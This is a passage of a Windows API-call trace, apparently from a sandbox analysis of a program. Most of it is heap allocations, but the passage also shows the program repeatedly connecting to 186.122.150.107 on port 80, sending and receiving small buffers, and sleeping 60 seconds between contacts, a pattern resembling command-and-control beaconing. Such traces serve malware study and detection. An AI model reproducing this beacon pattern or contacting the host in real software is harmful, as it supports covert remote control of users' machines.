buf=0x19d8f8*, len=203, flags=0) returned 203 [0197.150] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0197.420] closesocket (s=0x2bc) returned 0 [0197.421] WSACleanup () returned 0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25c0288 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bd0f0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bd318 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bd540 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25c04b0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bd768 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bdbb8 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bdde0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bef20 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bf148 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bf9e8 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bf7c0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bfc10 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bfe38 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c11a0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c2da8 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c3cc0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c4110 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c4788 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c0f78 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c22e0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c31f8 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c49b0 [0197.421] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c2730 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c3420 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c20b8 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c3648 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c1818 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c3870 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x25c1c68 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2345dd8 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x23463f0 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2344168 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2344578 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2345fe0 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x23461e8 [0197.422] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e4fd8 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e49c0 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e57f8 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e43a8 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e6838 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e3368 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e3160 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e7058 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e5c08 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x25e41a0 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2347bf0 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x23489b8 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x23483d0 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x23485c8 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x234a740 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2346e28 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2347800 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2347020 [0197.423] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2348bb0 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25ebd38 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25ed8c8 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25eb750 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25ec908 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25edac0 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25ed2e0 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x25eec78 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x25910c0 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2592d58 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594068 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594438 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594620 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2592988 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2592f40 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594bd8 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2592b70 [0197.424] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594250 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2593310 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x25938c8 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2594808 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x25949f0 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2596c40 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x25977b0 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2574de8 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2574fc0 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575548 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x25770f0 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575370 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2576990 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2574100 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575720 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2574860 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2576d40 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2574a38 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x25758f8 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575ad0 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x25772c8 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575ca8 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2575e80 [0197.425] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f7e08 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f76e8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f8fd8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f9fe0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f98c0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f6c38 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f8198 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f96f8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f78b0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f88b8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f9368 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f91a0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f9c50 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f9a88 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f9530 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x25f7358 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259bd78 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259a8d8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259c2a0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259aa90 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259ac48 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259a3b0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259ae00 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259bf30 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259c610 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259ba08 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x25995f0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259c458 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2599cd0 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x25990c8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259cb38 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x259c7c8 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cdf90 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cb628 [0197.426] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cc368 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cd5a0 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ce980 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cc1c0 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cb7d0 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cc510 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ce138 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ccd58 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cbe70 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cc6b8 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ce7d8 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25ce488 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cd8f0 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x25cdc40 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x259d598 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x259dbf8 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0a30 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0bc8 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0898 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0ef8 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a03d0 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0d60 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0568 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25a0700 [0197.427] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fb970 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fdae8 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fb310 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fd488 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fb4a8 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x25fb178 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a3a30 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a3d40 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a10d8 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a3ec8 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a1260 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a13e8 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4670 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4360 [0197.428] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4b08 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4980 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a44e8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a47f8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4c90 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a41d8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x25a4e18 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2605de8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d2760 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d28d8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d2a50 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0cf0 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d18b0 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d2470 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0130 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d1738 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0888 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d02a8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0e68 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0a00 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d22f8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d2d40 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0b78 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x25d0420 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257f8c8 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257ed88 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x257eef0 [0197.429] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2608268 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2608970 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607b60 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607458 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607f98 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26083d0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607cc8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26072f0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2608538 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26098e8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607890 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2607728 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26086a0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a7680 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a77d8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a7d38 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8298 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8548 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a7e90 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a7fe8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a87f8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a86a0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8950 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8140 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8aa8 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8c00 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8d58 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a83f0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x25a8eb0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9608 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25aabd0 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9750 [0197.430] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9b28 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25aafa8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a94c0 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9898 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9c70 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a90e8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9db8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9378 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25a9f00 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25aa048 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25aa6b0 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25aa420 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x25abc78 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2583eb8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x25828c8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2582da8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x25833c0 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2583c48 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x25834f8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260efb8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d890 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260d9c8 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260e9a0 [0197.431] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x260ead8 [0197.436] Sleep (dwMilliseconds=0xea60) [0207.459] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0207.459] socket (af=2, type=1, protocol=6) returned 0x2bc [0207.461] htons (hostshort=0x50) returned 0x5000 [0207.461] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0207.461] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0207.463] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0207.463] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0207.463] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0207.464] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0207.719] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0207.720] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0207.982] closesocket (s=0x2bc) returned 0 [0207.983] WSACleanup () returned 0 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bb4e8 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25b9d30 [0207.983] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x25bac48 [0207.983] 